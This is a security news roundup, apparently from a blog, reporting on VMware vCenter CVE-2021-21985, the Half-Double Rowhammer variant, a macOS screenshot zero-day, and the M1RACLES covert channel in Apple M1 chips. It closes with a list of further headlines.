New critical security bug in VMware vCenter allows a full takeover

Last week turned out to be extremely unfavorable for Apple. First, the world heard about a new 0-day vulnerability that allows attackers to secretly perform print screens. Yes, let’s forget about any privacy… And then just a few days later, news about M1RACLES has come to our attention too. What is all the hype about? The bug is a result of a flaw in the M1 design. And what is even worse… That information you will find below. In this issue, we also describe a new variant of the Rowhammer attack. Half-Double – this is the name it got – allows bypassing all current defenses. However, today’s Security Center opens the news about a new critical bug detected in VMware vCenter. Given the scale of the threat (9.8/10 CVSS!), exploiting the vulnerability is trivial. Hence the pressure from security experts and the vendor itself to urgently update vulnerable systems.

VMware vCenter with critical 9.8/10 severity bug – patch ASAP!

VMware’s virtualization management platform, vCenter Server, has a critical severity bug – rated as 9.8 out of 10. The company is urging customers to patch it “as soon as possible”. Successful exploitation would allow an attacker to execute arbitrary commands on the underlying vCenter host and take control of a company’s affected system.

VMware vCenter bug – why such a high CVSS rating?

The vulnerability tracked as CVE-2021-21985 impacts a popular vCenter Server platform used to administer VMware’s market-leading vSphere and ESXi host products. Specifically impacts the Virtual SAN Health Check plugin, which is enabled by default in vCenter Server even if the plugin is not actually being used.

Exploiting the vulnerability is trivial. All an attacker would need to do is be able to access the vCenter Server over port 443. So even if an organization has not exposed vCenter Server externally, attackers can still exploit this flaw once inside a network. 

Earlier last week, VMware reported another bug – CVE 2021-21986. This second bug has a medium CVSS severity rating of 6.5 and is tied to an authentication mechanism issue in vCenter Server plugins.

Workarounds and updates are already available to mitigate both flaws. In addition to the patches, VMware has made some improvements to plugin authentication in the vCenter Server plugin framework.

Sources 12

Rowhammer problem won’t go away soon – new Half-Double variant proofs it

Google researchers discovered a new variant of this attack against DRAM chips, dubbed “Half-Double,” that allows bypassing all current defenses. 

The new Half-Double hammering technique hinges on the weak coupling between two memory rows that are not immediately adjacent to each other but one row removed in an attempt to tamper with data stored in memory and attack a system.

Source: Google

We have described unusual Rowhammer techniques last month – Rowhammer refers to a class of DRAM vulnerabilities whereby repeated accesses to a memory row (“aggressor”) can induce an electrical disturbance big enough to flip bits stored in an adjacent row (“victim”), thereby allowing untrusted code to escape its sandbox and take over control of the system.

It works because DRAM cells have been getting smaller and closer together.

While DRAM manufacturers deployed countermeasures like Target Row Refresh (TRR) to thwart such attacks, the mitigations have been limited to two immediate neighbors of an aggressor row, thus excluding memory cells at a two-row distance. The imperfect protection gave an opportunity for new Rowhammer attacks such as TRRespass, SMASH, and now Half-Double. 

Google said it’s currently working with Partners to identify possible solutions for Rowhammer exploits.


Hackers used macOS 0-days to bypass privacy features and take sneaky screenshots

Apple has patched a critical bug in macOS that could be exploited to take screenshots of someone’s computer and capture images of their activity within applications or on video conferences without that person knowing.

Researchers have discovered that the XCSSET spyware was using the vulnerability, tracked as CVE-2021-30713, to take screenshots of the user’s desktop without requiring any additional permissions.

The flaw works by bypassing the Transparency Consent and Control (TCC) framework, which controls what resources applications have access to. For example – granting  video collaboration software access to the webcam and microphone, in order to participate in virtual meetings. Then, the exploit could allow an attacker to gain Full Disk Access, Screen Recording, or other permissions without requiring the user’s explicit consent.

Good news is that Apple already addressed the vulnerability in the latest version of macOS, Big Sur 11.4.


M1RACLES, the unpatchable bug in Apple M1 chips is an effect of its design

Software engineer Hector Martin from Asahi Linux has discovered a vulnerability (CVE-2021-30747) in the new Apple M1 chips, dubbed M1RACLES, that cannot be fixed.

The M1RACLES vulnerability allows two apps running on the same device to exchange data through a covert channel at the CPU’s level, without using memory, sockets, files, or any other normal operating system features

The flaw stems from the fact that the Arm system register encoded as s3_5_c15_c10_1 contains two bits that can be read and written at EL0 (Exception Level 0, application level privilege) from all cores simultaneously.

The issue can only be fixed with a redesign of the circuits, but the good news is that the severity of the vulnerability is rather low. The bug could be exploited to carry out cross-app tracking by some shady advertising companies for example… And it can abuse only apps already installed on a device. Researchers reported the issue to Apple, but it is not clear if the company will plan to fix it.


Do you have thirst for knowledge? There is ten more cybersecurity stories below

1. Newly Discovered Bugs in VSCode Extensions Could Lead to Supply Chain Attacks (The Hacker News)
2. Office 365 bug: Exchange Online, Outlook emails sent to junk folder (Bleeping Computer)
3. BazaLoader Masquerades as Movie-Streaming Service (Threat Post)
4. Zeppelin ransomware comes back to life with updated versions (Bleeping Computer)
5. Bluetooth bugs could allow attackers to impersonate devices (We Live Security)
6. Hackers compromised Japanese government offices via Fujitsu‘s ProjectWEB tool (Security Affairs)
7. Google Chrome now lets you run more commands via the address bar (Bleeping Computer)
8. Microsoft warns of current Nobelium phishing campaign impersonating USAID (ZDNet)
9. Secure Search is a Browser Hijacker – How to Remove it (Security Affairs)
10. SolarWinds hackers using NativeZone backdoor against 24 countries (Hack Read)